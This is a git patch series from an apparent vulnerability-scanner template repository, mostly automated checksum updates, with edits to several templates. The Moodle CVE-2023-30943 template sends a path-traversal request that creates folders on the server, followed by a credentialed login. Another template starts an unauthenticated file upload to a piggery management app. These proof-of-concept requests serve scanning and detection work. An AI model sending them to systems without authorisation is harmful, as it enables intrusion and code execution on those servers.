+http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7059,7 +7059,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:931fe95f189ef70576b754feb31d430f5b462c11 +templates-checksum.txt:7dbb96d72e44a92f78fba0700a804e791601829f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 8761d5ea15fcaa11da344469a309cd93f5e4b594 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Sep 2023 06:13:54 +0000 Subject: [PATCH 0297/1090] TemplateMan Update [Tue Sep 12 06:13:54 UTC 2023] :robot: --- http/exposures/backups/php-backup-files.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index 6c594a16f6..1394d02f9a 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -5,7 +5,7 @@ info: author: StreetOfHackerR007,pwnhxl,mastercho severity: medium metadata: - max-request: 1170 + max-request: 1196 tags: exposure,backup,php,disclosure,fuzz http: From 7f139926755385a8a931f730258ec94e6ff4f5dc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 12 Sep 2023 11:44:58 +0530 Subject: [PATCH 0298/1090] added content-type --- http/cves/2022/CVE-2022-23854.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index d1b99a36ce..42e24857df 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -38,11 +38,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - 'for 16-bit app support' - 'extensions' condition: and + - type: word + part: header + words: + - 'text/ini' + - type: status status: - 200 From d7e894cd7dff35bfa38e1a4d72bc15c5466c1ca0 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 12 Sep 2023 12:22:45 +0530 Subject: [PATCH 0299/1090] Update gitlab-public-registration.yaml --- http/misconfiguration/gitlab/gitlab-public-registration.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/gitlab/gitlab-public-registration.yaml b/http/misconfiguration/gitlab/gitlab-public-registration.yaml index 0e47e98cdc..13b049a56c 100644 --- a/http/misconfiguration/gitlab/gitlab-public-registration.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-registration.yaml @@ -1,7 +1,7 @@ id: gitlab-public-registration info: - name: GitLab public registration of new user + name: GitLab public registration of new user - Detect author: axrk severity: info metadata: @@ -20,6 +20,7 @@ http: words: - 'Register' - 'data-qa-selector="new_user_register_button"' + condition: or - type: word words: @@ -32,4 +33,4 @@ http: - type: word negative: true words: - - '' \ No newline at end of file + - '' From 5a9459d0fdc7f3c0b133e1229fd39b7b604fa14c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Sep 2023 12:44:40 +0530 Subject: [PATCH 0300/1090] updated template --- http/cves/2023/CVE-2023-30943.yaml | 39 ++++++++++++++++++++++++------ 1 file changed, 31 insertions(+), 8 deletions(-) diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 897865c6d3..d567170cc5 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -1,25 +1,37 @@ id: CVE-2023-30943 info: - name: Moodle - Cross-Site Scripting + name: Moodle - Cross-Site Scripting/Remote Code Execution author: ritikchaddha severity: medium description: | - The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. + The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel. reference: - https://www.sonarsource.com/blog/playing-dominos-with-moodles-security-1/?utm_source=twitter&utm_medium=social&utm_campaign=wordpress&utm_content=security&utm_term=mofu - https://nvd.nist.gov/vuln/detail/CVE-2023-30943 metadata: max-request: 2 - tags: cve,cve2023,moodle,xss + shodan-query: title:"Moodle" + tags: cve,cve2023,moodle,xss,rce,authenticated http: - raw: - | - GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/.png HTTP/1.1 + GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/.png HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded + - | + GET /login/index.php HTTP/2 + Host: {{Hostname}} + + - | + POST /login/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + anchor=&logintoken={{token}}&username={{username}}&password={{password}} + - | GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1 Host: {{Hostname}} @@ -29,17 +41,28 @@ http: matchers-condition: and matchers: - type: word - part: body + part: body_4 words: - - "" - - "moodle" + - "" + - ">archive" + - "File icon" condition: and - type: word - part: header + part: header_4 words: - text/html - type: status + part: header_4 status: - 200 + + extractors: + - type: regex + part: body + name: token + group: 1 + regex: + - 'name="logintoken" value="([a-zA-Z0-9]+)">' + internal: true From a455b4cf845b0e9b4ff482e01b10d2d8e58c66fe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Sep 2023 07:16:23 +0000 Subject: [PATCH 0301/1090] Auto Generated New Template Addition List [Tue Sep 12 07:16:23 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e69de29bb2..ab2c01bbf9 100644 --- a/.new-additions +++ b/.new-additions @@ -0,0 +1 @@ +http/misconfiguration/gitlab/gitlab-public-registration.yaml From fb3601af7ed652534e9f9fe4a96ccc7ca714b59d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Sep 2023 07:16:31 +0000 Subject: [PATCH 0302/1090] Auto Generated Templates Checksum [Tue Sep 12 07:16:31 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 388164aaf3..a2b96bc3da 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3740,7 +3740,7 @@ http/exposures/apis/wadl-api.yaml:2a68bb9d0c83056fa661184364eaa3bb1676a9a0 http/exposures/apis/wsdl-api.yaml:e96680c1602e3dfd78c066656580dbfa9c40ca79 http/exposures/backups/exposed-mysql-initial.yaml:acdc85b233eec58e2c294cb952e83d2c0b818631 http/exposures/backups/froxlor-database-backup.yaml:0fb55f6f7b2bd1da99d93ee3302e3c14f8f80a88 -http/exposures/backups/php-backup-files.yaml:3cc0251e1aa89e75922f303ff6694539e79692ff +http/exposures/backups/php-backup-files.yaml:455f8754e87f6f6140fa6bc4c3dcd83bade6b1aa http/exposures/backups/settings-php-files.yaml:3771e96806d801cffb1487210005d2d5087c78ca http/exposures/backups/sql-dump.yaml:f8b9dca037c8252e09216225933cfd7fb9a73569 http/exposures/backups/zip-backup-files.yaml:c19e1cc358346719f1a0f3a661a43f61e5628201 @@ -4406,6 +4406,7 @@ http/misconfiguration/genieacs-default-jwt.yaml:8bd6683d4adc6ee59444e52314b1b04c http/misconfiguration/git-web-interface.yaml:1415ab5a2d5a170516d1c155317e33b6ec77dca0 http/misconfiguration/gitea-public-signup.yaml:c076527b0e1e9496ade22db8a21ba4374545a0f3 http/misconfiguration/gitlab/gitlab-api-user-enum.yaml:a13fe47ff257f28efd52db5f61032de455fcb8f2 +http/misconfiguration/gitlab/gitlab-public-registration.yaml:196a75670035613419e2d04680f41e32f55fa2cc http/misconfiguration/gitlab/gitlab-public-repos.yaml:b65c56ae71c3d920517861463164025df2838c7e http/misconfiguration/gitlab/gitlab-public-signup.yaml:b7b09ab6b10ae459787d29fbbea37ba2caab8e49 http/misconfiguration/gitlab/gitlab-public-snippets.yaml:5a026365959b31d059f9f2be7e2baf1d9b6edd52 @@ -7059,7 +7060,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:7dbb96d72e44a92f78fba0700a804e791601829f +templates-checksum.txt:fceaf08613125d02c886eaa3b6900595ea814088 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 850873489318cbf12c5a0c154857eb171937b97b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Sep 2023 12:49:44 +0530 Subject: [PATCH 0303/1090] added classification --- http/cves/2023/CVE-2023-30943.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index d567170cc5..c88fddc75e 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -9,6 +9,11 @@ info: reference: - https://www.sonarsource.com/blog/playing-dominos-with-moodles-security-1/?utm_source=twitter&utm_medium=social&utm_campaign=wordpress&utm_content=security&utm_term=mofu - https://nvd.nist.gov/vuln/detail/CVE-2023-30943 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2023-30943 + cwe-id: CWE-73 metadata: max-request: 2 shodan-query: title:"Moodle" From 74eff31e1d7002aa1ca16dc7047d81dfd1a0f1e1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Sep 2023 12:50:58 +0530 Subject: [PATCH 0304/1090] info update --- http/cves/2023/CVE-2023-37629.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index ad404c7579..12945abb69 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -1,6 +1,7 @@ id: CVE-2023-37629 + info: - name: Online Piggery Management System v1.0 - unauthenticated file upload + name: Online Piggery Management System v1.0 - Unauthenticated File Upload author: Harsh severity: critical description: | @@ -15,7 +16,7 @@ info: cwe-id: CWE-434 metadata: verified: true - tags: fileupload,unauthenticated,exploitdb + tags: cve,cve2023,fileupload,rce,opms http: - raw: @@ -23,6 +24,7 @@ http: POST /pig/add-pig.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP + -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP Content-Disposition: form-data; name="pigno" From 3f3e491bf8e65d06998c7ff7464a9072d89546aa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Sep 2023 07:23:51 +0000 Subject: [PATCH 0305/1090] Auto Generated New Template Addition List [Tue Sep 12 07:23:51 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ab2c01bbf9..eabdd1ba0b 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ +http/exposed-panels/symantec/symantec-phishing-panel.yaml http/misconfiguration/gitlab/gitlab-public-registration.yaml From 094f724c95589765ce699c38cf3fa6e58ab83b8c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Sep 2023 07:23:58 +0000 Subject: [PATCH 0306/1090] Auto Generated Templates Checksum [Tue Sep 12 07:23:58 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a2b96bc3da..1ae5042aa5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3574,6 +3574,7 @@ http/exposed-panels/symantec/symantec-epm-login.yaml:6f91a21884850990743f2107f4b http/exposed-panels/symantec/symantec-ewep-login.yaml:c65b15e01b242e147392611d06a14ca4b2faba7d http/exposed-panels/symantec/symantec-iam-console.yaml:6b5f51ea0dffbcb834e8a4e5861c50e643c6bfc8 http/exposed-panels/symantec/symantec-pgp-global-directory.yaml:daa94b9ae8e309cc3133be930abc61573b79096e +http/exposed-panels/symantec/symantec-phishing-panel.yaml:21d89e100695eb5061f44f5cd275f62799edf2c1 http/exposed-panels/synapse-mobility-panel.yaml:be63433fce3df1c1eb55b27baa12d25ea1ffe80b http/exposed-panels/syncserver-panel.yaml:1b8457c7d6b0c683683afa3757c8d0df244d1963 http/exposed-panels/syncthru-web-service.yaml:013c535b7c9aa764e56d877091158b748d143ec1 @@ -4246,7 +4247,6 @@ http/miscellaneous/detect-dns-over-https.yaml:a0d05c1d3526c2368d9957b37ab44f6177 http/miscellaneous/dir-listing.yaml:397e6f739d91d1935d49bdd18bb899b4072efcdd http/miscellaneous/email-extractor.yaml:63aa4024f928d8c41e0d80eb19f2b02e1b02af25 http/miscellaneous/exposed-file-upload-form.yaml:9c025ae5e5ce865588cd1d3ea91522b559ff8a23 -http/miscellaneous/external-service-interaction.yaml:c5a4a57e1aaa133711e415b5f69f20c835a2ba71 http/miscellaneous/firebase-database-extractor.yaml:0c276fddfc49fdf19983f9ce36b40351af0aec57 http/miscellaneous/google-floc-disabled.yaml:b741fb4fc11cff0f2c861f961a8bfff633e05196 